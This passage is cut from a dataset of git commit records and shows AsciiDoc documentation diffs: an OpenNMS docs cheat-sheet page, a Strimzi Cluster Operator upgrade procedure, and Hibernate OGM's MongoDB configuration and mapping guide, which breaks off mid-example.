manual:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documentation uses the AsciiDoc format. There are a number of guides that will help you to get started with using AsciiDoc:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[AsciiDoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nFor other resources, to gain familiarity with AsciiDoc, you can visit:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nNB:\n
We recommend you use the cheatsheets (they are super useful!).\n","old_contents":"\n[[doc-guidelines-cheat-sheets]]\n== Cheat Sheets and additional hints\n\nFor how to build the manual see:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documents use the AsciiDoc format, see:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[Aciidoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nHere you can find other resources to get familiar with AsciiDoc, see:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nThe cheatsheets are really useful!\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e53709b846966fbbe694ff755b93d7d0b0787ef6","subject":"fix misplaced tag parameter in backup command (#1410)","message":"fix misplaced tag parameter in backup command (#1410)\n\n","repos":"ppatierno\/kaas,scholzj\/barnabas,ppatierno\/kaas,scholzj\/barnabas","old_file":"documentation\/book\/proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0.adoc","new_file":"documentation\/book\/proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0.adoc","new_contents":"\/\/ This module is included in the following assemblies:\n\/\/\n\/\/ assembly-upgrade.adoc\n\n[id='proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0-{context}']\n= Upgrading the Cluster Operator from 0.10.0 to 0.11.0\n\nThis procedure will describe how to upgrade a Cluster Operator deployment from version 0.10.0 to version 0.11.0.\nThe availability of Kafka clusters managed by the Cluster Operator is not affected by the upgrade operation.\n\n.Prerequisites \n\n* An existing version 0.10.0 Cluster Operator deployment to be upgraded.\n\n.Procedure\n\n. Backup the existing Cluster Operator resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl get`:\n+\n----\nkubectl get all -l app=strimzi -o yaml > strimzi-backup.yaml\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc get`:\n+\n----\noc get all -l app=strimzi -o yaml > strimzi-backup.yaml\n----\n\n. Update the Cluster Operator. \nYou will need to modify the installation files according to the namespace the Cluster Operator is running in.\n+\ninclude::frag-cluster-operator-namespace-sed.adoc[]\n+\nIf you modified one or more environment variables in your existing Cluster Operator `Deployment`, edit\n`install\/cluster-operator\/050-Deployment-cluster-operator.yaml` to reflect the changes that you made.\n\n. 
When you have an updated configuration you can deploy it along with the rest of the install resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl apply`:\n+\n----\nkubectl apply -f install\/cluster-operator\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc apply`:\n+\n----\noc apply -f install\/cluster-operator\n----\n+\nWait for the associated rolling updates to complete.\n\n. Update existing resources to cope with deprecated custom resource properties.\n+\n* If you have `Kafka` resources that specify `Kafka.spec.topicOperator`, rewrite them to use `Kafka.spec.entityOperator.topicOperator` instead.\n","old_contents":"\/\/ This module is included in the following assemblies:\n\/\/\n\/\/ assembly-upgrade.adoc\n\n[id='proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0-{context}']\n= Upgrading the Cluster Operator from 0.10.0 to 0.11.0\n\nThis procedure will describe how to upgrade a Cluster Operator deployment from version 0.10.0 to version 0.11.0.\nThe availability of Kafka clusters managed by the Cluster Operator is not affected by the upgrade operation.\n\n.Prerequisites \n\n* An existing version 0.10.0 Cluster Operator deployment to be upgraded.\n\n.Procedure\n\n. Backup the existing Cluster Operator resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl get`:\n+\n----\nkubectl get all -l app=strimzi -o yaml > strimzi-backup.yaml\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc get`:\n+\n----\noc get -l all app=strimzi -o yaml > strimzi-backup.yaml\n----\n\n. Update the Cluster Operator. \nYou will need to modify the installation files according to the namespace the Cluster Operator is running in.\n+\ninclude::frag-cluster-operator-namespace-sed.adoc[]\n+\nIf you modified one or more environment variables in your existing Cluster Operator `Deployment`, edit\n`install\/cluster-operator\/050-Deployment-cluster-operator.yaml` to reflect the changes that you made.\n\n. When you have an updated configuration you can deploy it along with the rest of the install resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl apply`:\n+\n----\nkubectl apply -f install\/cluster-operator\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc apply`:\n+\n----\noc apply -f install\/cluster-operator\n----\n+\nWait for the associated rolling updates to complete.\n\n. Update existing resources to cope with deprecated custom resource properties.\n+\n* If you have `Kafka` resources that specify `Kafka.spec.topicOperator`, rewrite them to use `Kafka.spec.entityOperator.topicOperator` instead.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a26679da20148e77f2d391392d7dc1f566c263a0","subject":"OGM-1326 Add example of associations between entities of the same class (#25)","message":"OGM-1326 Add example of associations between entities of the same class (#25)\n\nAdded an example to the documentation that shows a OneToOne mapping to the same entity. ie. 
A person has a spouse that is another person.","repos":"Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/mongodb.asciidoc","new_contents":"[[ogm-mongodb]]\n\n== MongoDB\n\nhttp:\/\/www.mongodb.org[MongoDB] is a document-oriented datastore\nwritten in C++ with strong emphasis on ease of use.\nThe nested nature of documents makes it a particularly natural fit for most object representations.\n\nThis implementation is based upon the MongoDB Java driver.\nThe currently supported version is {mongodb-version}.\n\n=== Why should I use Hibernate OGM with MongoDB\n\nIt is possible that in your project you have some entities that might benefit from MongoDB's\ndynamic schema, but having a schema makes it possible to obtain better performance because\nthe datastore can use the schema information to apply optimizations that\nwouldn't otherwise be possible.\n\nJPA already has ways to define constraints and indexes, and via Hibernate OGM you can\nuse the same annotations for both your relational and non-relational needs.\n\nHibernate OGM cannot make MongoDB transactional, but by using the JPA transaction demarcation\nmechanism it can group the operations and flush them to the datastore to\nminimize the number of requests.\n\nAnother benefit of using Hibernate OGM with MongoDB is that it also makes it possible\nto use Hibernate Search out of the box. Hibernate Search brings the power of Lucene\nto your project, giving you the ability to run fast Google-like searches.\n\nThis means that you can query the datastore using:\n\n* JPQL queries (see <<ogm-jpql-query>>)\n* MongoDB native queries (see <<ogm-mongodb-queries-native>>)\n* Full-text queries (see <<ogm-query-using-hibernate-search>>)\n\nOne of Hibernate OGM's main goals is to map entities in a \"natural\" way; this means that your\ndatastore will still be accessible in case you need to use other tools or want to run\nnative queries occasionally.\n\n=== Configuring MongoDB\n\nConfiguring Hibernate OGM to use MongoDB is easy:\n\n* Add the MongoDB module and driver to the classpath\n* Provide the MongoDB URL to Hibernate OGM\n\n==== Adding MongoDB dependencies\n\nTo add the dependencies via Maven, add the following module:\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-mongodb<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nThis will pull the MongoDB driver transparently.\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the following directories of the distribution:\n\n* `\/lib\/required`\n* `\/lib\/mongodb`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\nMongoDB does not require Hibernate Search for the execution of JPQL or HQL queries.\n\n==== MongoDB specific configuration properties\n\nTo get started quickly, pay attention to the following options:\n\n* `hibernate.ogm.datastore.provider`\n* `hibernate.ogm.datastore.host`\n* `hibernate.ogm.datastore.database`\n\nAnd we should have you running.\n
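\nAs a minimal sketch, those three options could go into a `hibernate.properties` file like this (the host and database name are illustrative):\n\n[source, properties]\n----\nhibernate.ogm.datastore.provider = mongodb\nhibernate.ogm.datastore.host = 127.0.0.1:27017\nhibernate.ogm.datastore.database = my_database\n----\n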
\nThe following properties are available to configure MongoDB support:\n\n.MongoDB datastore configuration properties\nhibernate.ogm.datastore.provider::\nTo use MongoDB as a datastore provider, this property must be set to `mongodb`\nhibernate.ogm.option.configurator::\nThe fully-qualified class name or an instance of a programmatic option configurator (see <<ogm-mongodb-programmatic-configuration>>)\nhibernate.ogm.datastore.host::\nThe hostname and port of the MongoDB instance.\nThe optional port is concatenated to the host and separated by a colon.\nWhen using replica sets, you can define the various servers in a comma-separated list of hosts and ports.\nLet's see a few valid examples:\n\n* `mongodb.example.com`\n* `mongodb.example.com:27018`\n* `2001:db8::ff00:42:8329` (IPv6)\n* `[2001:db8::ff00:42:8329]:27018` (IPv6 with port requires the IPv6 to be surrounded by square brackets)\n* `www.example.com, www2.example.com:123, 192.0.2.1, 192.0.2.2:123, 2001:db8::ff00:42:8329, [2001:db8::ff00:42:8329]:123` (replica set)\n+\nThe default value is `127.0.0.1:27017`. If left undefined, the default port is `27017`.\nhibernate.ogm.datastore.port::\nDeprecated: use `hibernate.ogm.datastore.host`.\nThe port used by the MongoDB instance.\nIgnored when multiple hosts are defined.\nThe default value is `27017`.\nhibernate.ogm.datastore.database::\nThe database to connect to. This property has no default value.\nhibernate.ogm.datastore.create_database::\nIf set to true, the database will be created if it doesn't exist.\nThe default value of this property is false.\nhibernate.ogm.datastore.username::\nThe username used when connecting to the MongoDB server.\nThis property has no default value.\nhibernate.ogm.datastore.password::\nThe password used to connect to the MongoDB server.\nThis property has no default value.\nThis property is ignored if the username isn't specified.\nhibernate.ogm.error_handler::\nThe fully-qualified class name, class object or an instance of `ErrorHandler` to get notified upon errors during flushes (see <<ogm-api-error-handler>>)\nhibernate.ogm.mongodb.driver.*::\nDefines a prefix for all options which should be passed through to the MongoDB driver.\nFor available options refer to the JavaDocs of link:http:\/\/api.mongodb.org\/java\/3.0\/com\/mongodb\/MongoClientOptions.Builder.html[MongoClientOptions.Builder]. All `String`, `int` and `boolean` properties\ncan be set, e.g. `hibernate.ogm.mongodb.driver.serverSelectionTimeout`.\nhibernate.ogm.mongodb.authentication_database::\nDefines the name of the authentication database; the default value is _admin_.\nhibernate.ogm.mongodb.authentication_mechanism::\nDefines the authentication mechanism to use. Possible values are:\n\n* `BEST`: Handshakes with the server to find the best authentication mechanism.\n* `SCRAM_SHA_1`: The SCRAM SHA 1 Challenge Response mechanism as described in this link:http:\/\/tools.ietf.org\/html\/rfc5802[RFC].\n* `MONGODB_CR`: The MongoDB Challenge Response mechanism (deprecated since MongoDB 3)\n* `GSSAPI`: The GSSAPI mechanism. See the http:\/\/tools.ietf.org\/html\/rfc4752[RFC]\n* `MONGODB_X509`: The MongoDB X.509\n* `PLAIN`: The PLAIN mechanism. 
See the http:\/\/www.ietf.org\/rfc\/rfc4616.txt[RFC]\nhibernate.ogm.datastore.document.association_storage::\nDefines the way OGM stores association information in MongoDB.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.document.options.AssociationStorageType` enum):\n\n* `IN_ENTITY`: store association information within the entity\n* `ASSOCIATION_DOCUMENT`: store association information in a dedicated document per association\n\n+\n`IN_ENTITY` is the default and recommended option\nunless the association navigation data is much bigger than the core of the document and leads to performance degradation.\nhibernate.ogm.mongodb.association_document_storage::\nDefines how to store association documents (applies only if the `ASSOCIATION_DOCUMENT`\nassociation storage strategy is used).\nPossible strategies are (values of the `org.hibernate.ogm.datastore.mongodb.options.AssociationDocumentStorageType` enum):\n\n* `GLOBAL_COLLECTION` (default): stores the association information in a unique MongoDB collection for all associations\n* `COLLECTION_PER_ASSOCIATION`: stores the association in a dedicated MongoDB collection per association\n\nhibernate.ogm.datastore.document.map_storage::\nDefines the way OGM stores the contents of map-typed associations in MongoDB.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.document.options.MapStorageType` enum):\n\n* `BY_KEY`: map-typed associations with a single key column which is of type `String` will be stored as a sub-document,\norganized by the given key; not applicable for other types of key columns, in which case always `AS_LIST` will be used\n* `AS_LIST`: map-typed associations will be stored as an array containing a sub-document for each map entry.\nAll key and value columns will be contained within the array elements\n\nhibernate.ogm.mongodb.write_concern::\nDefines the write concern setting to be applied when issuing writes against the MongoDB datastore.\nPossible settings are (values of the `WriteConcernType` enum):\n`ACKNOWLEDGED`, `UNACKNOWLEDGED`, `FSYNCED`, `JOURNALED`, `REPLICA_ACKNOWLEDGED`, `MAJORITY` and `CUSTOM`.\nWhen set to `CUSTOM`, a custom `WriteConcern` implementation type has to be specified.\n+\nThis option is case insensitive and the default value is `ACKNOWLEDGED`.\nhibernate.ogm.mongodb.write_concern_type::\nSpecifies a custom `WriteConcern` implementation type (fully-qualified name, class object or instance).\nThis is useful in cases where the pre-defined configurations are not sufficient,\ne.g. if you want to ensure that writes are propagated to a specific number of replicas or a given \"tag set\".\nOnly takes effect if `hibernate.ogm.mongodb.write_concern` is set to `CUSTOM`.
\nhibernate.ogm.mongodb.read_preference::\nSpecifies the `ReadPreference` to be applied when issuing reads against the MongoDB datastore.\nPossible settings are (values of the `ReadPreferenceType` enum):\n`PRIMARY`, `PRIMARY_PREFERRED`, `SECONDARY`, `SECONDARY_PREFERRED` and `NEAREST`.\nIt's currently not possible to plug in custom read preference types.\nIf you're interested in such a feature, please let us know.\n\nFor more information, please refer to the\nhttp:\/\/api.mongodb.org\/java\/current\/com\/mongodb\/WriteConcern.html[official documentation].\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.mongodb.MongoDBProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `MongoDBProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n[[ogm-mongodb-annotation-configuration]]\n==== Annotation based configuration\n\nHibernate OGM allows you to configure store-specific options via Java annotations.\nYou can override global configurations for a specific entity or even a specific property\nby virtue of the location where you place that annotation.\n\nWhen working with the MongoDB backend, you can specify the following settings:\n\n* the write concern for entities and associations using the `@WriteConcern` annotation\n* the read preference for entities and associations using the `@ReadPreference` annotation\n* a strategy for storing associations using the `@AssociationStorage` and `@AssociationDocumentStorage` annotations\n* a strategy for storing the contents of map-typed associations using the `@MapStorage` annotation\n\nRefer to <<mongodb-associations>> to learn more about the options related to storing associations.\n\nThe following shows an example:\n\n.Configuring the association storage strategy using annotations\n====\n[source, JAVA]\n----\n@Entity\n@WriteConcern(WriteConcernType.JOURNALED)\n@ReadPreference(ReadPreferenceType.PRIMARY_PREFERRED)\n@AssociationStorage(AssociationStorageType.ASSOCIATION_DOCUMENT)\n@AssociationDocumentStorage(AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION)\n@MapStorage(MapStorageType.AS_LIST)\npublic class Zoo {\n\n @OneToMany\n private Set<Animal> animals;\n\n @OneToMany\n private Set<Person> employees;\n\n @OneToMany\n @AssociationStorage(AssociationStorageType.IN_ENTITY)\n private Set<Person> visitors;\n\n \/\/ getters, setters ...\n}\n----\n====\n\nThe `@WriteConcern` annotation on the entity level expresses that all writes should be done using the `JOURNALED` setting.\nSimilarly, the `@ReadPreference` annotation advises the engine to preferably read that entity from the primary node if possible.\nThe other two annotations on the type-level specify that all associations of the `Zoo`\nclass should be stored in separate association documents, using a dedicated collection per association.\nThis setting applies to the `animals` and `employees` associations.\nOnly the elements of the `visitors` association will be stored in the document of the corresponding `Zoo` entity\nas per the configuration of that specific property, which takes precedence over the entity-level configuration.
\n\n[[ogm-mongodb-programmatic-configuration]]\n==== Programmatic configuration\n\nIn addition to the annotation mechanism,\nHibernate OGM also provides a programmatic API for applying store-specific configuration options.\nThis can be useful if you can't modify certain entity types or\ndon't want to add store-specific configuration annotations to them.\nThe API allows setting options in a type-safe fashion on the global, entity and property levels.\n\nWhen working with MongoDB, you can currently configure the following options using the API:\n\n* write concern\n* read preference\n* association storage strategy\n* association document storage strategy\n* strategy for storing the contents of map-typed associations\n\nTo set these options via the API, you need to create an `OptionConfigurator` implementation\nas shown in the following example:\n\n.Example of an option configurator\n====\n[source, JAVA]\n----\npublic class MyOptionConfigurator extends OptionConfigurator {\n\n @Override\n public void configure(Configurable configurable) {\n configurable.configureOptionsFor( MongoDB.class )\n .writeConcern( WriteConcernType.REPLICA_ACKNOWLEDGED )\n .readPreference( ReadPreferenceType.NEAREST )\n .entity( Zoo.class )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT )\n .associationDocumentStorage( AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION )\n .mapStorage( MapStorageType.AS_LIST )\n .property( \"animals\", ElementType.FIELD )\n .associationStorage( AssociationStorageType.IN_ENTITY )\n .entity( Animal.class )\n .writeConcern( new RequiringReplicaCountOf( 3 ) )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT );\n }\n}\n----\n====\n\nThe call to `configureOptionsFor()`, passing the store-specific identifier type `MongoDB`,\nprovides the entry point into the API. Following the fluent API pattern, you can then configure\nglobal options (`writeConcern()`, `readPreference()`) and navigate to single entities or properties to apply options\nspecific to these (`associationStorage()` etc.).\nThe call to `writeConcern()` for the `Animal` entity shows how a specific write concern type can be used.\nHere `RequiringReplicaCountOf` is a custom implementation of `WriteConcern` which ensures\nthat writes are propagated to a given number of replicas before a write is acknowledged.\n\nOptions given on the property level precede entity-level options. So e.g. the `animals` association of the `Zoo`\nclass would be stored using the in entity strategy, while all other associations of the `Zoo` entity would\nbe stored using separate association documents.
\n\nSimilarly, entity-level options take precedence over options given on the global level.\nGlobal-level options specified via the API complement the settings given via configuration properties.\nIn case a setting is given via a configuration property and the API at the same time,\nthe latter takes precedence.\n\nNote that for a given level (property, entity, global),\nan option set via annotations is overridden by the same option set programmatically.\nThis allows you to change settings in a more flexible way if required.\n\nTo register an option configurator, specify its class name using the `hibernate.ogm.option.configurator` property.\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou can also pass in an `OptionConfigurator` instance or the class object representing the configurator type.\n
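\nAs a sketch, registering the configurator from the example above through that property could look like this (the `org.example` package is illustrative):\n\n[source, properties]\n----\nhibernate.ogm.option.configurator = org.example.MyOptionConfigurator\n----\n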
\n\n[[ogm-mongodb-storage-principles]]\n=== Storage principles\n\nHibernate OGM tries to make the mapping to the underlying datastore as natural as possible\nso that third party applications not using Hibernate OGM can still read\nand update the same datastore.\nWe worked particularly hard on the MongoDB model\nto offer various classic mappings between your object model\nand the MongoDB documents.\n\nTo describe things simply, each entity is stored as a MongoDB document.\nThis document is stored in a MongoDB collection named after the entity type.\nThe navigational information for each association from one entity to (a set of) entities\nis stored in the document representing the entity we are departing from.\n\n[[mongodb-built-in-types]]\n==== Properties and built-in types\n\nEach entity is represented by a document.\nEach property, or more precisely each column, is represented by a field in this document,\nthe field name being the column name.\n\nHibernate OGM supports by default the following property types:\n\n* `java.lang.String`\n\n[source, JSON]\n----\n { \"text\" : \"Hello world!\" }\n----\n\n* `java.lang.Character` (or char primitive)\n\n[source, JSON]\n----\n { \"delimiter\" : \"\/\" }\n----\n\n* `java.lang.Boolean` (or boolean primitive)\n\n[source, JSON]\n----\n { \"favorite\" : true } # default mapping\n { \"favorite\" : \"T\" } # if @Type(type = \"true_false\") is given\n { \"favorite\" : \"Y\" } # if @Type(type = \"yes_no\") is given\n { \"favorite\" : 1 } # if @Type(type = \"numeric_boolean\") is given\n----\n\n* `java.lang.Byte` (or byte primitive)\n\n[source, JSON]\n----\n { \"display_mask\" : \"70\" }\n----\n\n* `java.lang.Byte[]` (or byte[])\n\n[source, JSON]\n----\n { \"pdfAsBytes\" : BinData(0,\"MTIzNDU=\") }\n----\n\n* `java.lang.Short` (or short primitive)\n\n[source, JSON]\n----\n { \"urlPort\" : 80 }\n----\n\n* `java.lang.Integer` (or integer primitive)\n\n[source, JSON]\n----\n { \"stockCount\" : 12309 }\n----\n\n* `java.lang.Long` (or long primitive)\n\n[source, JSON]\n----\n { \"userId\" : NumberLong(\"-6718902786625749549\") }\n----\n\n* `java.lang.Float` (or float primitive)\n\n[source, JSON]\n----\n { \"visitRatio\" : 10.39 }\n----\n\n* `java.lang.Double` (or double primitive)\n\n[source, JSON]\n----\n { \"tax_percentage\" : 12.34 }\n----\n\n* `java.math.BigDecimal`\n\n[source, JSON]\n----\n { \"site_weight\" : \"21.77\" }\n----\n\n* `java.math.BigInteger`\n\n[source, JSON]\n----\n { \"site_weight\" : \"444\" }\n----\n\n* `java.util.Calendar`\n\n[source, JSON]\n----\n { \"creation\" : \"2014\/11\/03 16:19:49:283 +0000\" }\n----\n\n* `java.util.Date`\n\n[source, JSON]\n----\n { \"last_update\" : ISODate(\"2014-11-03T16:19:49.283Z\") }\n----\n\n* `java.util.UUID`\n\n[source, JSON]\n----\n { \"serialNumber\" : \"71f5713d-69c4-4b62-ad15-aed8ce8d10e0\" }\n----\n\n* `java.util.URL`\n\n[source, JSON]\n----\n { \"url\" : \"http:\/\/www.hibernate.org\/\" }\n----\n\n* `org.bson.types.ObjectId`\n\n[source, JSON]\n----\n { \"object_id\" : ObjectId(\"547d9b40e62048750f25ef77\") }\n----\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in MongoDB;\nsetting a value to null is the same as removing the field\nfrom the corresponding object in the db.\n\nThis can have consequences when it comes to queries on null values.\n====\n\n==== Entities\n\nEntities are stored as MongoDB documents and not as BLOBs:\neach entity property will be translated into a document field.\nYou can use `@Table` and `@Column` annotations\nto rename respectively the collection the document is stored in\nand the document's field a property is persisted in.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\"\n}\n----\n====\n\n.Rename field and collection using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n\/\/ Overrides the collection name\n@Table(name = \"News_Collection\")\npublic class News {\n\n @Id\n private String id;\n\n \/\/ Overrides the field name\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"headline\": \"On the merits of NoSQL\"\n}\n----\n====\n\n===== Identifiers\n\n[NOTE]\n====\nHibernate OGM always stores identifiers using the `_id` field of a MongoDB document, ignoring\nthe name of the property in the entity.\n\nThat's a good thing, as MongoDB gives special treatment to the `_id` property.\n====\n\nAn identifier type may be one of the <<mongodb-built-in-types,built-in types>>\nor a more complex type represented by an embedded class.\nWhen you use a built-in type, the identifier is mapped like a regular property.\nWhen you use an embedded class, then the `_id` represents a nested document\ncontaining the embedded class properties.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"bookmark_1\",\n \"title\" : \"Hibernate OGM documentation\"\n}\n----\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\nNews collection as JSON in MongoDB\n\n[source, JSON]\n----\n\n{\n \"_id\" : {\n \"author\" : \"Guillaume\",\n \"title\" : \"How to use Hibernate OGM ?\"\n },\n \"content\" : \"Simple, just like ORM but with a NoSQL database\"\n}\n\n----\n====\n\nGenerally, it is recommended to work with MongoDB's object id data type.
\nThis will facilitate the integration with other applications expecting that common MongoDB id type.\nTo do so, you have two options:\n\n* Define your id property as `org.bson.types.ObjectId`\n* Define your id property as `String` and annotate it with `@Type(type=\"objectid\")`\n\nIn both cases the id will be stored as native `ObjectId` in the datastore.\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n===== Identifier generation strategies\n\nYou can assign id values yourself or let Hibernate OGM generate the value using the\n`@GeneratedValue` annotation.\n\nThere are four different strategies:\n\n1. <<mongodb-identity-id-generation-strategy, IDENTITY>> (suggested)\n2. <<mongodb-table-id-generation-strategy, TABLE>>\n3. <<mongodb-sequence-id-generation-strategy, SEQUENCE>>\n4. <<mongodb-auto-id-generation-strategy, AUTO>>\n\n[[mongodb-identity-id-generation-strategy]]\n*1) IDENTITY generation strategy*\n\nThis is the preferred strategy: Hibernate OGM will create the identifier upon insertion.\nTo apply this strategy the id must be one of the following:\n\n* annotated with `@Type(type=\"objectid\")`\n* `org.bson.types.ObjectId`\n\nas in the following examples:\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n[[mongodb-table-id-generation-strategy]]\n*2) TABLE generation strategy*\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"GuitarPlayer\",\n \"next_val\" : 101\n}\n----\n====\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnValue = \"guitarPlayer\",\n valueColumnName = \"nextGuitarPlayerId\"\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nGuitarPlayerSequence collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"guitarPlayer\",
